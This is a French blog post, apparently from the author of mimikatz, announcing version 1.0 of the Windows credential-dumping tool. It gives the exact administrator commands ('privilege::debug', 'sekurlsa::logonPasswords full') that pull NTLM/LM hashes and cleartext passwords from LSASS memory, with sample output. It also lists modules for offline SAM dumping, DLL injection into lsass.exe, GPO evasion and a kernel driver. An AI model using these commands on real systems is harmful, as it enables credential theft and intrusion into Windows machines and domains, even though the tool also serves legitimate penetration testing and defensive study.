mimikatz mimikatz 1.0 vient de sortir en version alpha beta RC !

Pour les pressés cherchant des mots de passe…

A exécuter en administrateur :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
...

Modules

mimikatz est maintenant organisé autours de modules locaux :

  • "standard" ; commandes de base
  • crypto ; Cryptographie et certificats
  • sekurlsa ; Dump de hashes et de mots de passes Windows
  • system ; Gestion système
  • process ; Manipulation des processus
  • thread ; Manipulation des threads
  • service ; Manipulation des services
  • privilege ; Manipulation des privilèges
  • winmine ; Manipulation du démineur de Windows XP (démonstration)
  • minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)
  • nogpo ; Pour éviter quelques GPO triviales
  • samdump ; Dump de SAM offline
  • inject ; Injecteur de librairies
  • ts ; Manipulations Terminal Server
  • divers ; Fonctions diverses trop petites pour s’émanciper

A part pour le module « standard », la séparation du module et de la fonction appelée se fait avec le séparateur ::
Exemple : inject::process lsass.exe sekurlsa.dll

Librairies

Ce n’est pas forcément le plus discret, mais j’aime injecter des librairies

  • sekurlsa ; manipulation des données de sécurités dans LSASS
  • klock ; manipulation de bureaux
  • kelloworld ; libraire à injecter, pour l’exemple

Pilote

Être administrateur n’est pas toujours suffisant, il peut aussi être intéressant de disposer d’un point d’entrée en mode utilisateur.
Un pilote, mimikatz.sys est donc disponible.

Les commandes distantes peuvent être appelées en les précédants d’un :

  • @ pour les libraires (@ seul clos la connexion à la librairie, et la décharge)
  • ! pour le pilote mimikatz (! seul clos la connexion au pilote)
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s